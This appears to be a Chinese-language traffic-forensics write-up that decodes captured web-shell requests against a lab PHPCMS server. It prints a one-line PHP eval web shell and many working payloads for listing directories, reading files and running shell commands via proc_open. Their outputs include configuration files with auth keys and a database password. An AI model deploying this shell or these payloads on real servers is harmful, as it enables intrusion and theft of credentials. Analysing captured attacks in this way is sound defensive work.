@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");echo fwrite(fopen('C:\\phpStudy\\WWW\\1.txt','w'),$_POST['z1'])?'1':'0';;echo("X@Y");die();
// 寫入文件 C:\\phpStudy\\WWW\\1.txt
<?php @eval($_POST['t'])?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\phpStudy\\WWW\\ 目錄下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\phpStudy\\WWW\\ 目錄下的所有文件

然后再看另一個小馬文件 :

grep -n -C 32 'POST /uploadfile/2017/0905/20170905055411283.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' > base64

http ?? ipython                                                                                                                                                                              
In [1]: with open("base64") as f:
   ...:     for line in f:
   ...:         print line[2:-12].decode("base64")

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/crons/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/include/crons/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/ 下的所有文件
X@Yphpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 讀取文件 /var/www/html/api.php 內(nèi)容
<?php                  
/**                       
 *  index.php API ....    
 *                        
 * @copyright           (C) 2005-2010 PHPCMS
 * @license             http://www.phpcms.cn/license/
 * @lastmodify          2010-7-26
 */                       
define('PHPCMS_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
include PHPCMS_PATH.'phpcms/base.php';
$param = pc_base::load_sys_class('param');
$_userid = param::get_cookie('_userid');
if($_userid) {            
    $member_db = pc_base::load_model('member_model');
    $_userid = intval($_userid);
    $memberinfo = $member_db->get_one(array('userid'=>$_userid),'islock');
    if($memberinfo['islock']) exit('<h1>Bad Request!</h1>');
}                         
$op = isset($_GET['op']) && trim($_GET['op']) ? trim($_GET['op']) : exit('Operation can not be empty');
if (isset($_GET['callback']) && !preg_match('/^[a-zA-Z_][a-zA-Z0-9_]+$/', $_GET['callback']))  unset($_GET['callback']);
if (!preg_match('/([^a-z_]+)/i',$op) && file_exists(PHPCMS_PATH.'api/'.$op.'.php')) {
    include PHPCMS_PATH.'api/'.$op.'.php';
} else {                  
    exit('API handler does not exist');
}                         
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/phpcms/ 下的所有文件
model/   2017-09-03 03:31:17 4096    0777
libs/   2017-09-03 03:31:16 4096    0777
languages/  2017-09-03 03:31:15 4096    0777
./  2017-09-03 03:31:27 4096    0777
plugin/ 2017-09-03 03:31:27 4096    0777
templates/  2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:38:34 4096    0777
modules/    2017-09-03 03:31:27 4096    0777
base.php    2017-09-03 03:31:15 8462    0777
index.html  2017-09-03 03:31:15 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/phpcms/base.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 讀取文件 /var/www/html/phpcms/base.php 內(nèi)容
<?php
/**
 *  base.php PHPCMS............
 *
 * @copyright           (C) 2005-2010 PHPCMS
 * @license             http://www.phpcms.cn/license/
 * @lastmodify          2010-6-7
 */
define('IN_PHPCMS', true);                                                                     
//PHPCMS........
define('PC_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
if(!defined('PHPCMS_PATH')) define('PHPCMS_PATH', PC_PATH.'..'.DIRECTORY_SEPARATOR);
...

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/caches/ 下的所有文件
caches_admin/    2017-09-03 03:37:50 4096    0777
caches_content/ 2017-09-03 03:37:50 4096    0777
poster_js/  2017-09-03 03:37:50 4096    0777
bakup/  2017-09-03 03:37:50 4096    0777
caches_commons/ 2017-09-03 03:37:50 4096    0777
caches_tpl_data/    2017-09-03 03:37:50 4096    0777
caches_linkage/ 2017-09-03 03:37:50 4096    0777
caches_model/   2017-09-03 03:37:50 4096    0777
./  2017-09-03 03:45:14 4096    0777
vote_js/    2017-09-03 03:37:50 4096    0777
caches_search/  2017-09-03 03:38:33 4096    0755
caches_scan/    2017-09-03 03:37:50 4096    0777
caches_member/  2017-09-03 03:37:50 4096    0777
sessions/   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:38:34 4096    0777
configs/    2017-09-03 03:37:50 4096    0777
caches_template/    2017-09-03 03:45:14 4096    0777
install.lock    2017-09-03 03:38:34 0   0644
error_log.php   2017-09-05 02:54:12 769 0644
index.html  2017-09-03 03:31:45 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/caches/configs/ 下的所有文件
./   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:45:14 4096    0777
ku6server.php   2017-09-03 03:31:45 208 0777
sub_config.php  2017-09-03 03:31:45 1376    0777
route.php   2017-09-03 03:31:45 803 0777
credit.php  2017-09-03 03:31:45 122 0777
cache.php   2017-09-03 03:31:45 330 0777
database.php    2017-09-03 03:38:32 324 0777
model_config.php    2017-09-03 03:31:45 52  0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php    2017-09-03 03:31:45 781 0777
snda.php    2017-09-03 03:31:45 51  0777
system.php  2017-09-05 00:11:58 2430    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/system.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 讀取文件 /var/www/html/caches/configs/system.php 內(nèi)容
X@Y<?php                 
return array(            
//........               
'web_path' => '/',                                                                                                     
//Session....     
'session_storage' => 'mysql',
'session_ttl' => 1800,   
'session_savepath' => CACHE_PATH.'sessions/',
'session_n' => 0,        
//Cookie....             
'cookie_domain' => '', //Cookie ......
'cookie_path' => '', //Cookie ........
'cookie_pre' => 'LTBnY_', //Cookie ......................................Cookie....
'cookie_ttl' => 0, //Cookie ..........0 ................
//............           
'tpl_root' => 'templates/', //................
'tpl_name' => 'default', //................
'tpl_css' => 'default', //............
'tpl_referesh' => 1,     
'tpl_edit'=> 0,//....................
//............           
'upload_path' => PHPCMS_PATH.'uploadfile/',
'upload_url' => 'http://192.168.20.88/uploadfile/', //........
'attachment_stat' => '1',//.................... 0 .... 1 ...... ....: ......................
'js_path' => 'http://192.168.20.88/statics/js/', //CDN JS
'css_path' => 'http://192.168.20.88/statics/css/', //CDN CSS
'img_path' => 'http://192.168.20.88/statics/images/', //CDN img
'app_path' => 'http://192.168.20.88/',//................
'charset' => 'gbk', //..........
'timezone' => 'Etc/GMT-8', //..............php 5.1................Etc/GMT-8 ............ GMT+8
'debug' => 0, //................
'admin_log' =>           
17:57:02.163812 IP 192.168.20.117.1423 > 172.16.10.110.8888: Flags [P.], seq 1461:2610, ack 768, win 63472, length 1149
E....;@...Q|...u..       
n..".-.<X.#o,P...Y... 1, //....................
'errorlog' => 1, //1................ cache/error_log.php | 0................
'gzip' => 1, //....Gzip..........
'auth_key' => 'AivCd1tuXDZfzVOKBybL', //....
'lang' => 'zh-cn',  //..........
'lock_ex' => '1',  //........................................nfs..........
'admin_founders' => '1', //..........ID......ID........
'execution_sql' => 0, //EXECUTION_SQL
'execution_sql' => 0, //EXECUTION_SQL
'phpsso' => '1',    //........phpsso
'phpsso_appid' => '1',  //....id    
'phpsso_api_url' => 'http://192.168.20.88/phpsso_server',   //........
'phpsso_auth_key' => 'AUch7BSWgtuikaORhVcUyOgkyY69Glwb', //........
'phpsso_version' => '1', //phpsso....
'html_root' => '/html',//................
'safe_card'=>'1',//..............
'connect_enable' => '1',    //..................
'sina_akey' => '',  //sina AKEY
'sina_skey' => '',  //sina SKEY
'snda_akey' => '',  //.......... akey
'snda_skey' => '',  //.......... skey
'qq_akey' => '',    //qq skey
'qq_skey' => '',    //qq skey
'qq_appkey' => '',  //QQ........ appkey
'qq_appid' => '',   //QQ........ appid
'qq_callback' => '',    //QQ........ callback
'admin_url' => '',  //..................
);                        
?>


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行命令 whoami
www-data

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;uname -a;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行命令 uname -a
Linux localhost 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ipconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行命令 : pwd
/var/www/html/uploadfile/2017/0905

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ifconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行命令 ifconfig
ens33     Link encap:Ethernet  HWaddr 00:0c:29:da:d6:4e  
          inet addr:192.168.20.88  Bcast:192.168.20.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feda:d64e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:150300 errors:0 dropped:0 overruns:0 frame:0
          TX packets:49841 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:162871217 (162.8 MB)  TX bytes:5569466 (5.5 MB)
                         
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:227 errors:0 dropped:0 overruns:0 frame:0
          TX packets:227 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:20038 (20.0 KB)  TX bytes:20038 (20.0 KB)
              

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/include/ 下的所有文件
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/ 下的所有文件
./   2017-09-03 03:30:49 4096    0755
html/   2017-09-03 03:38:34 4096    0777
../ 2017-09-03 00:57:48 4096    0755

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/ 下的所有文件
phpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/phpcms/ 下的所有文件
./   2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/phpcms/libs/ 下的所有文件
./   2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/data/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/phpcms/libs/data/ 下的所有文件
./   2017-09-03 03:31:16 4096    0777
font/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:16 4096    0777
ipdata/ 2017-09-03 03:31:16 4096    0777 
dict/   2017-09-03 03:31:16 4096    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/include/ 下的所有文件
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/caches/ 下的所有文件
caches_admin/    2017-09-03 03:37:50 4096    0777
caches_content/ 2017-09-03 03:37:50 4096    0777
poster_js/  2017-09-03 03:37:50 4096    0777
bakup/  2017-09-03 03:37:50 4096    0777
caches_commons/ 2017-09-03 03:37:50 4096    0777
caches_tpl_data/    2017-09-03 03:37:50 4096    0777
caches_linkage/ 2017-09-03 03:37:50 4096    0777
caches_model/   2017-09-03 03:37:50 4096    0777
./  2017-09-03 03:45:14 4096    0777
vote_js/    2017-09-03 03:37:50 4096    0777
caches_search/  2017-09-03 03:38:33 4096    0755
caches_scan/    2017-09-03 03:37:50 4096    0777
caches_member/  2017-09-03 03:37:50 4096    0777
sessions/   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:38:34 4096    0777
configs/    2017-09-03 03:37:50 4096    0777
caches_template/    2017-09-03 03:45:14 4096    0777
install.lock    2017-09-03 03:38:34 0   0644
error_log.php   2017-09-05 02:54:12 769 0644
index.html  2017-09-03 03:31:45 1   0777


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/caches/configs/ 下的所有文件
./   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:45:14 4096    0777
ku6server.php   2017-09-03 03:31:45 208 0777
sub_config.php  2017-09-03 03:31:45 1376    0777
route.php   2017-09-03 03:31:45 803 0777
credit.php  2017-09-03 03:31:45 122 0777
cache.php   2017-09-03 03:31:45 330 0777
database.php    2017-09-03 03:38:32 324 0777
model_config.php    2017-09-03 03:31:45 52  0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php    2017-09-03 03:31:45 781 0777
snda.php    2017-09-03 03:31:45 51  0777
system.php  2017-09-05 00:11:58 2430    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/database.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 讀取文件 /var/www/html/caches/configs/database.php 內(nèi)容

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 讀取文件 /var/www/html/caches/configs/database.php 內(nèi)容
<?php                 
return array (           
    'default' => array ( 
        'hostname' => 'localhost',
        'port' => 3306,  
        'database' => 'phpcmsv9',
        'username' => 'root',
        'password' => '123456',
        'tablepre' => 'v9_',
        'charset' => 'gbk',
        'type' => 'mysqli',
        'debug' => true,
        'pconnect' => 0,
        'autoconnect' => 0
        ),
);                                           
?>

